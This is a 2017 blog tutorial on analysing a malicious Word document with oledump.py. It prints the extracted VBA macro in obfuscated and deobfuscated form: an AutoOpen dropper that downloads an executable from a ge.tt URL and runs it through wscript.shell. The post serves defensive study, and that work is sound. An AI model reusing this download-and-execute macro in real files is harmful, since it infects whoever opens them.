Sunday, 4 June 2017

Analyzing Microsoft Office Files

Use any of the below tools for analyzing office documents.

oledump.py / officeparser.py / olevba.py / pyOLEScanner.py

1. Find malicious code
2. Extract code / Deobfuscate
3. Analyze code
4. Extract host and network indicators

 Microsoft Office Binary File Format Notes
-------- -------- -------- ------- --------- --------
Structured Storage (OLE SS) defines a file system inside the binary Microsoft Office file.
Data can be “storage” (folder) and “stream” (file).
Excel stores data inside the “workbook” stream.
PowerPoint stores data inside the “PowerPoint Document” stream.
Word stores data inside various streams.

 Tools for Analyzing Microsoft Office Files
----------- ---------- ---------- ------------ -------
"OfficeMalScanner" locates shellcode and VBA macros from MS Office (DOC, XLS, and PPT) files.

"MalHost-Setup" extracts shellcode from a given offset in an MS Office file and embeds it an EXE file for further analysis. (Part of OfficeMalScanner).

"Offvis" shows raw contents and structure of an MS Office file, and identifies some common exploits.

"Hachoir-urwid" can navigate through the structure of binary Office files and view stream contents.
"Office Binary Translator" converts DOC, PPT, and XLS files into Open XML files (includes BiffView tool).

"pyOLEScanner.py" can examine and decode some aspects of malicious binary Office files.
FileHex (not free) and "FileInsight" hex editors can parse and edit OLE structures.

I.

 1. Start analyzing file with # file document

 # file 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin

Output provides a lot of useful information including:

39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin: Composite Document File V2 Document (File format: CDF V2 Document)
Little Endian
Os: Windows,
Version 6.1,
Code page: 1252,
Author: Admin,
Name of Creating Application: Microsoft Office Word,
Total Editing Time: 01:47:00, Create Time/Date: Tue Jan 13 00:32:00 2015,
                                 Last Saved Time/Date: Thu May  7 04:22:00 2015,
Number of Pages: 1, Number of Words: 21, Number of Characters: 122, Security: 0,
                             Template: Normal, Last Saved By: Raz0r, Revision Number: 198,

 2. Next we will examine file with oledump.py 
   
oledump.py is a program to analyze OLE files (Compound File Binary Format). These files contain streams of data. oledump allows you to analyze these streams.
 
Many applications use this file format, the best known is MS Office. .doc, .xls, .ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).  

oledump has an embedded man page: run oledump.py -m to view it.

oledump.py 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      9602 '1Table'
  5:    137803 'Data'
  6:       539 'Macros/PROJECT'
  7:        71 'Macros/PROJECTwm'
  8: M    5258 'Macros/VBA/NewMacros'
  9: m     938 'Macros/VBA/ThisDocument'
 10:      3483 'Macros/VBA/_VBA_PROJECT'
 11:       578 'Macros/VBA/dir'
 12:      4096 'WordDocument'
remnux@remnux:~/Desktop/Malicious-files/doc$

[(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)]

  One of the cool things about oledump.py is its ability to mark streams that contain VBA code.
 
In the above output we can see two streams called NewMacros and ThisDocument. Letters M and m indicate that VBA code is present. Lowercase m means VBA contains only attributes statements (less interesting):
 
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
remnux@remnux:~/Desktop/Malicious-files/doc$  

Given stream can be viewed by adding -s with an object number. As we know we are dealing with the VBA code the -v option will instruct oledump.py to decompress VBA code and make it easy to read.

Let’s dump it for later comparison with other tools.
$ oledump.py -s9 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > attribute_code

 Now let’s move to the stream marked with capital M, this is usually where analysts find juicy stuff:

$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin
Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JhjBjhGJHBfgjhffGggfGVgfVFGuHgHfGcV As Long, ByVal GyghGGBtgnfgdfGDFRGhojoJGBJFGhjFghJfHgh As String, ByVal tGtgfRDEVDFVUJUjhJGHJkujkuhJihuhBfgBF As String, ByVal lkaaJQQSxJfdLyE As Long, ByVal hujhBjhBfvcVcVdsswwsDswdFfgHUJFGHUJOIJJHhHjHGYYFtBVcfGGdGgDFGHuDfghuhDGhjjk As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal gBfGFGHFGhRfghrtjgHJfGHJFGHjTyhjGFGVRFTRftyFtyFghDFvtRTRGfGDTR As Long, ByVal ltnbTaRjJOa6JYn As String, ByVal liCRZKNefyicowI As String, ByVal lGONydFEvaD5IuX As Long, ByVal lmRYfcuLs5uEk2Z As Long) As Long
#End If
 
Sub AutoOpen()
    Dim loyagdbd As String
    Dim hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg As String
    hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg = CurDir()
    Dim NewPath As String
    NewPath = Replace(hhNjnhbhghyjhtgjhGjhFGHjkGjkfGBJHDTRGVDTrhfg, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    lkFjuexVzhTjcrT = ijHujhBujHBjHBgFfVGHGHjGhJFVGBHfvGFghJFV & iJJHBujHgbgbtgftYtyuRwerqweRweoijhoIJOJnikjgHNFVBcv & ""
    iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG = lkFjuexVzhTjcrT
    OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb = NewPath & Split(LotsofFuckingStringinallinOne)(1) & hFHBGjhGgFHdfGdfGHjHuIjhGhFGgHGtyFGgHUfgjhfgHJvbNfgUJHTyuiIUOIUJIYJHfg + CheckNumbers
    lRoosrSIPgRZZm4 = OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb
    lFA9cYQDsQOBIWU = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + iJghBfgBgBfgfVfBfVBFVBFhjhBjcVBcdVBCVBGBhjfGBFG & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb & CheckNumbers & CheckNumbers, 0, 0)
     
   If Dir(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb) <> "" Then
   Dim oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh As Object
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh = oJiHCFDFGEdCdfrVgyBHgyHJYGHjGbhYTfGHGfHJKHJJgUJIFGHjDfgHJdfh.exec(OIKJIKHJHBNJVbCVBCXVSDfsDFASdfwDEGERTYITIopoijhihujhb)
   End If
End Sub

 It is safe to say we found our malicious code! We will dump the code for further analysis.

$ oledump.py -s8 -v 39670aa4e8b209ccb70f1ea19bdf94031f497c98a553749b0335d9c779982854.bin > malicious-code

Before we will jump into deobfuscation and code analysis check how above tools cope with the same malicious file.
[ in software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements.”]

https://www.upwork.com/hiring/development/understanding-obfuscated-code-deobfuscate-php-javascript/


II.

1. Deobfuscation / Code deobfuscation

Unfortunately neither of the tools is able to deobfuscate the code it would be too easy! So far we researched different methods of finding and extracting malicious code from OLE documents. It is high time to deobfuscate this,

There is never a “one fits all” solution to deobfuscate code. Good thing to start with is to clean up the code from randomly generated variable names. For this just open the code in any text editor and use “find and replace” feature to replace randomly named variables into something more readable.

I like to rename variables so they start with capital letter informing me about the variable type, for instance:

S_var1 means this variable is of a String type.

This is how code looks like after initial clean up:

  Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4)
    S_var7 = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3)
    S_var8 = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers
    Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6)
    S_var9 = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers
    S_var10 = S_var9 & S_var8 & ""
    S_var11 = S_var10
    S_var12 = NewPath & Split(LotsofFuckingStringinallinOne)(1) & S_var7 + CheckNumbers
    S_var13 = S_var12
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + S_var11 & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & S_var12 & CheckNumbers & CheckNumbers, 0, 0)

   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3))
   Set O_var1 = O_var1.exec(S_var12)
   End If
End Sub

  After a few operations code becomes much more readable:-
 
  Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long
#Else
    Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long
#End If

Sub AutoOpen()
    Dim S_var5 As String
    Dim S_var6 As String
    S_var6 = CurDir()
    Dim NewPath As String
    NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming")
    NewPath = "C:\Users\Public\Documents"
    Dim CheckNumbers As String
    CheckNumbers = ""
    Dim S_var7 As String
    Dim NewString As String
    NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB"
    Dim LotsofFuckingStringinallinOne As String
    LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student"
    Dim AnotherShitisHereSaysthis As String
    AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark"
    Dim FinalWord As String
    FinalWord = "wscript."
    S_var7 = "SbieCtrl".exe"
    S_var8 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    Dim IsProgramRegistered As String: IsProgramRegistered = "wscripts"
    S_var9 = ""
    S_var10 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var11 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download"
    S_var12 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var13 = "C:\Users\Public\Documents\SbieCtrl.exe"
    S_var14 = ProudtoBecomeaNepaliReverseEngineer(0,"http://ge.tt/api/1/files/2gmBurF2/0/blob?download","C:\Users\Public\Documents\SbieCtrl.exe", 0, 0)
     
   If Dir(S_var12) <> "" Then
   Dim O_var1 As Object
   Set O_var1 = CreateObject("wscript.shell")
   Set O_var1 = O_var1.exec("C:\Users\Public\Documents\SbieCtrl.exe")
   End If
End Sub

Code analysis summary:

AutoOpen() will be executed after the document is opened.

ProudtoBecomeNepaliReverseEngineer is just an alias to URLDownloadToFile()

URLDownloadToFile() accepts five parameters, including URL address
     http://ge.tt/api/1/files/2gmBurF2/0/blob?download and a file name C:\Users\Public\Documents\SbieCtrl.exe.

Both information serve as a network and host indicators that might be used to check for successful compromise.

No comments:

Post a Comment